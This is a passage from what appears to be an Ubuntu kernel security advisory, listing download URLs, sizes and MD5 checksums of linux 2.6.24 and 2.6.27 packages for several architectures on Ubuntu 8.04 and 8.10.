  Size/MD5:    70254 58835e1fc4291f4eb0c480721a304f76
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    77452 f157cd0a93a43348e31964a3cdd2e598
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   146272 fbf7a6ec42279729661e7bcb2adeb2a0
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   165004 b0e57a6126b30ff0a5549d48b3653432
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   388016 5c62d956894d6e2ebbfb8bb6ed0670bf
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   350458 77e7f9a0b26ba0add618a7e45d00a695
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:  2431532 f2e3b5d076bc2998253f28a3a00620be
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:  3473296 1472edab5674676d1155f04dfa3be5a3
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc-smp_2.6.24-27.68_powerpc.deb
  Size/MD5:   653666 e73d24fa2b2a51c960a2efa02006fbaf
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc64-smp_2.6.24-27.68_powerpc.deb
  Size/MD5:   658806 223da03ca58d5590d932c735fdc91576
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc_2.6.24-27.68_powerpc.deb
  Size/MD5:   653624 1a2e6959b80b658fbd40e7749891cf46
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc-smp_2.6.24-27.68_powerpc.deb
  Size/MD5: 20177426 8d0fad2c44885b8f892b370d9fab6ffc
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc64-smp_2.6.24-27.68_powerpc.deb
  Size/MD5: 21379358 9680899f4cdaf11068cbacffc6de4903
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc_2.6.24-27.68_powerpc.deb
  Size/MD5: 19951618 87af3eeecd8a02416aec847eaf78c1a4
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.68_powerpc.deb
  Size/MD5:   698360 f165e548a9bb971ec8defa20d3a9e1d3
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   266746 c97db9c8b65e3876115592530b3b72e6
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   307724 4e2b85869f1d5eb9cb303b577ddcffbb
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   192256 df43cd47b549fce25609ff4156873f85
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   201682 5d3d4b5fab4496844e93ec6d94613e1e
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   272034 46ee36417aa8e8a1153c8d700b0da72f
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   306002 5c2038831d2ab288253ca1c57ede5f30
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:  1807712 ee862a4950aaf3ddc6516a9f8f48d741
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:  2119348 9daf3f2b92e4f34e8f523dfc100de9f4
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   235196 181baa81a54929790493ff89ab3fcd20
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   225394 e4c0d08720ee49984e279c3a5621d992
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   170444 c0587d15145c95f7f5d54906332c6492
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   199748 8a1c62dbd766945a609345cd576d24f0
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   117960 c8d68fdaf446c12f69a164476803fe8a
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   139258 46d5d2a9faef3ddbe1f5a4c359778b1c
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    45376 158f3600a35f8ccd724f5b19a9d6d09f
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    46838 9fa15b63ea87ca5c5a79208df4ca8714
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    51136 ddfa3c272c81afaf249bcd4bf4ec1611
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    60298 091e98b3ac5d29e9ef7f6a90cc447984
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    74178 cfdda6157ac50d6e1484f1409da3c759
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    87216 85d0958bcdefad728964716ac578644e
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    76092 733309bdaaa071d7887aa958226678be
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    30230 83d1654507baba818e3b9dcd69eea2b7
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:     8488 051c32d0d4e5eb3aed799d23298f2385
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    10030 60c003e23d56e3e08f5895649f22bf77
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    57450 803cb5c2bcbf5e731d6340046e7828cc
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    68754 3849ee078bd14dfc8284ec5a183c2e1a
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   101182 98b5461ab5da300faaf7c1dbae055221
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   147834 80a406c225ce93579ceba4084e592526
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:  1565842 2bb8e544b976373f69ab64892a5c26d1
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:  1514622 79434a5f26e3b381c30ee9bc1da8462d
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    76672 02c6f630855e06043a11f366a6287577
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    85974 00168d3860a04a0725ce30d09dedc1b3
http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    12704 cf3b0c2678baceb9a83b125debc2c299
http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    14562 84cde7a173b96e12e01e0b51740fa8f2
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   450816 9a3bdc6c8911883f0206d73127797845
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   505314 5f4ec06646d33a8b1d94180b288f320c
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    83684 71c29130c5b1c90fcf6e30d00e8a1b9e
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   108846 f8ffd77938efdb8edfe987a225adab72

sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:    59578 6f2a003bbf059004e8bffe2f9c5dd521
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:    71734 d5bab2e989f83b0c3849b72b05c2ae25
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:    42448 4865beae3050e6725033c53879bd37fa
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:    91782 1f78b301d8fc350eda15acf549122c58
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:   587180 cfe84f79bf1f2e3d90910db32f90e9d6
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:   171076 82a86f9bbc3a639a26501b017d9acfcb
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:    22362 ea35ad08431deacb64718b48c628ce9c
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:    46056 1d92935e02b0f7a7da2c86eb3abf3b53
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:   152976 7b571d87f9bbfc6c2283a394f4dda9e8
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:  2132312 c1bdd4c02c37520e2348c4f5c24b1cce
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64-smp_2.6.24-27.68_sparc.deb
  Size/MD5:   566552 13239a88dba53dfd3bd338777b8fb1e2
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64_2.6.24-27.68_sparc.deb
  Size/MD5:   564864 af25b68291b3f63bc843c97ae544b02e
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64-smp_2.6.24-27.68_sparc.deb
  Size/MD5: 14097908 f69d61c50edb36757977aec8df161dbf
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64_2.6.24-27.68_sparc.deb
  Size/MD5: 13828920 4e1f81ccc1336091b04e1b6bf4aa4b93
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.68_sparc.deb
  Size/MD5:   753250 a1c8d3d5bd0e16a482a173775615c3de
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:   270060 210d2a847159c1e98e9bc584f8e7ddfc
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:   190368 f6501c6995686fce8cb1498d7806fc95
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:   263034 011627fbd630d2c66947b1b30cb8e75f
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:  1386432 a300d57dd07a9a8524802b07d27c0718
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:   175436 0fabf05b3d254c83501c59cf9768f86e
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:   122106 3b51f301338c11c9b3c0d8cd5c56db5c
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:    40398 3d6e1455329396d28199ecffa5c4c821
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:    48052 14afb43ce40eb4a662e73cdf0f43df7f
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:     8696 ddc216c3c064f20854632902a320e3d0
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:    60514 4c21b11e75684445416ff28283de7dea
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:   106838 d13d597e7313f17548f1f7f4b4466bbc
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:  1002092 b2dac3e8a8590e879fe20649aa3731d3
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:     9520 235f012bdc6a0c78e788eb3c8a7a10f0
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:   391832 28a6e4dc23e04f46edc39ac352971914
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb
  Size/MD5:    75926 149062e3e85ef9488756f4c7b96ae34d

Updated packages for Ubuntu 8.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.46.diff.gz
  Size/MD5:  3290817 bc34db88612555d154e23206423412c0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.46.dsc
  Size/MD5:     2749 07c254518ef27ca0e5ce64069ad9e6a4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz
  Size/MD5: 63721466 482b04f680ce6676114ccfaaf8f66a55

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-17.46_all.deb
  Size/MD5:  3492674 e98ce22c3f225ced0d3c2723af239b94
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17_2.6.27-17.46_all.deb
  Size/MD5:  5906768 053607f65b1f6ed74d811e6fb61c3334
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-17.46_all.deb
  Size/MD5: 52051202 197265e351585fd0bc238eea45315a39

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:    36538 f7c7407633faa2c8d9007c3bb7ebe2e1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:   265216 60e8ef2d1537fa4a56015946fd1abd9c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:    53440 ea24246514123457d146214f8338b484
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:    43040 3aea92c7bbd3dff26e57d3bf7a6e92b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:    52350 26d506b7e7ced6d5b76f2c2901f57215
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:    89834 15f9dca2668d2b3c2216082ae93879f3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:    38184 30cf7f5b2879f141ef7f95c51867bf14
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:   677068 b29b6ccea0136d896d8da740312a6b70
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:   158612 41ad14f42d1627b98743f27cca6e079a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:    46336 84974022681fc77befeab611c3000268
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:   154230 f174230ab8387aaa830e47f87f5ff6dd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:   313114 2c12623b64944ff4a5d41c02b0e29f49
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:  2602540 19c88c75ddeb7b00581acd4f82ecdf11
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.46_amd64.deb
  Size/MD5:   662598 7319f0b08e61ba8702ec08a5ee9e17c7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.46_amd64.deb
  Size/MD5:   662580 491d733eeaedf583b867c4d4ced2ff06
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.46_amd64.deb
  Size/MD5: 23071578 6c4a2cea6017a189e8bb918b31b21c04
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.46_amd64.deb
  Size/MD5: 23073538 cfe81537c74dbf02ea8088c160f93776
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.46_amd64.deb
  Size/MD5: 10478938 3aa39b34b211b6a823e6641e04dc3cb8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.46_amd64.deb
  Size/MD5:   676052 2e4a028eaabfdbc05bdf50bf6f4e57d0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:   434924 e91564db38f3e4dd68661d4fc20176b9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:   186504 b5cfef7f46e8e4973873044161750832
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:   275580 bf8c625a1fd0a3c547ddd2b30efcdd19
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:  1810418 d702cfbaeb8bb19cac6892fa89a11914
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:   151340 470b5b0bd6e1d69a65c87e02da0d0805
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:   194282 cc5716f24790f28a6d6c5a61428cfc9a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:   168190 da5aee00ad2057358eff2fafdadfbecc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:    36428 58dc104a0f87bffa8d41c74ac1874b1a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:    83446 9bfa83f9fbd2b05cd228308a4440986b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:    71998 dbb700adaca55d119a48f38ce6f2fc36
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:    23240 6d08f177e4bb1f124f5d3d00558f7bf9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:     9012 9be136eca401f0a5edcd9472682edf0f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:    68532 db6ba2efada864c2755a0086dec26a1d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:   110306 f822bc6479324326c6aa73491090396d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:  1276204 57f7538e075d482e1f75650c31be6079
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:    47608 81cb320a32e948efa3ce9934af92b1f2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:    13474 f8ad1b9785071af2fcd4a6a68d281326
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:   393976 03badba78894595caaece71168cb2401
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:   200800 634c45d6c6fb964760b3cdbeef36ac50
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb
  Size/MD5:    13614 aabebd73ef69a1ec4ff071c7dcc47e25

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:    33948 39d43c0cc53106e077047ee9f8418c16
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:   244720 006b19814df01a3ed77bbea227d9d21e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:    55396 b04438d274d36e4aa96867d05e64bdaf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:    41214 45ca536a01a114e5c465bc9c107016ea
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:    48694 2d17fd3dd01bf5ac57e40b7e25b0fba3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:    86926 42fa1fac04021291a1562b73b71f4bd2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:    34062 dc4d0bb52d953038a3a04d2572487d08
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:   675492 08ca7d68eac62c911702cd93e0dd39e3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:   158400 55e9fb15c4458498eeb24eb651261530
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:    43618 ecc79e7ebd7e9d4705274b0ed05460a1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:   145226 8eaffa48d78e43750bb098392204d402
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:   302410 d7090f3a8a1883a71c229c12b35b3de4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:  2436642 fcd7d906c465fb4a4539b9660736869a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.46_i386.deb
  Size/MD5:   644562 4f1133627198e4a74facb93a58b4dd06
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.46_i386.deb
  Size/MD5:   645762 c1a233a090e1234c635f23644a28ef74
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.46_i386.deb
  Size/MD5: 23500370 04213d97c4e479226e65387b81595f78
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.46_i386.deb
  Size/MD5: 23631924 6fd10b5f2b25d3ac14ca2b2ada21e655
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.46_i386.deb
  Size/MD5: 10116904 397534c43f8a7706b347017ef76d469b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.46_i386.deb
  Size/MD5:   676058 a2c6ee0e3be368f264330920711e72aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:   433072 1e7fd0062b5a0d77034b4578bfd26e12
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:   171304 18959979b6863d1fd1de6b6245cb837a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:   264114 d07d84ba9b972cebfda02c7fd4a7bdbf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:  1994328 f7813840fa92245b20d196a264f75f64
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:   150964 9ebb19c8d243fa58c504de8dd20e6541
